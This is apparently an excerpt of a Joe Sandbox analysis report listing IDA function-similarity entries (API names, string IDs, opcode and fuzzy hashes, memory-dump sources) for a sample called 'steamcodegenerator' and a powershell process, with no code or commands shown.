                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleErrorLastMode
                                                                        • String ID:
                                                                        • API String ID: 953036326-0
                                                                        • Opcode ID: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
                                                                        • Instruction ID: 02d4279841fa1fa9e5b9901f44237508d674d011d23f8885f3c37f67c376d417
                                                                        • Opcode Fuzzy Hash: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
                                                                        • Instruction Fuzzy Hash: 4A918D73A08652C5FB619F6594822BD2BF0AF45BA8F145139DE0EABB95DE38F442C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: __except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 1467352782-3733052814
                                                                        • Opcode ID: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
                                                                        • Instruction ID: 51c0734d117669ff82318b2449df55344b0d587a4b3e83229577a2c4b2152235
                                                                        • Opcode Fuzzy Hash: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
                                                                        • Instruction Fuzzy Hash: F171C372A08682E6DB688F25D44177D7BB0FB45B88F048136DA4DABB8ACF3CD465C740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFrameInfo__except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 2558813199-1018135373
                                                                        • Opcode ID: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                        • Instruction ID: b30b0f92e2a3d8c4867ff28ecaa991e9b6649e213845cab004e20f793a5f9de9
                                                                        • Opcode Fuzzy Hash: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                        • Instruction Fuzzy Hash: EB514A72A19781C6DA64EB15E04226E77B4FB88B90F101534EB8D9BB56DF3CE471CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastWrite
                                                                        • String ID: U
                                                                        • API String ID: 442123175-4171548499
                                                                        • Opcode ID: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                        • Instruction ID: 34cc0d11e54b4e4d18bc54f90ae67786609a89b0fd537aa67043308001db8347
                                                                        • Opcode Fuzzy Hash: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                        • Instruction Fuzzy Hash: 41418E33A19A85C1EB209F65E8453AA67B1FB98794F404031EE4DDBB98EF3CE441CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                        • String ID: bad locale name
                                                                        • API String ID: 1838369231-1405518554
                                                                        • Opcode ID: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                        • Instruction ID: eed6b19078a45543164d6af464cb2bb3c6ca6e84d18b8edaae5e40b6100e3239
                                                                        • Opcode Fuzzy Hash: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                        • Instruction Fuzzy Hash: 67016D22609BC1CAC748DF75A88116C77B5FB58B88B189539CA8CD771BEF38D5A0C340
                                                                        APIs
                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6635466AA), ref: 00007FF66354AB6C
                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6635466AA), ref: 00007FF66354ABAD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFileHeaderRaise
                                                                        • String ID: csm
                                                                        • API String ID: 2573137834-1018135373
                                                                        • Opcode ID: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                        • Instruction ID: 3da228f472d25c40d6747283f8f98c078711f1df41f634279f2be034c7494e83
                                                                        • Opcode Fuzzy Hash: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                        • Instruction Fuzzy Hash: 8E115E32619B8182EB648B16F40025977E5FB88B94F584234EA8D5B765DF3CD5518700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Facet_LockitLockit::~_Register
                                                                        • String ID: @F
                                                                        • API String ID: 2774363102-2348236604
                                                                        • Opcode ID: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                        • Instruction ID: 988609b9e3bc516e4674fdf209b7511c68f16c2df7832ff1fbf58b32fdd5792c
                                                                        • Opcode Fuzzy Hash: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                        • Instruction Fuzzy Hash: 07E0ED26608B01C1EA14EF16F4920AE7370FB89BE4B4D5032EF8E5B756CE3CD5928B40
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.1970135785.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction ID: fc9c11f2e9de72c48521401c155ed76442494769910caf6d0da160ae5e66bd74
                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction Fuzzy Hash: 6B01677125CB0C4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5D736E881CB45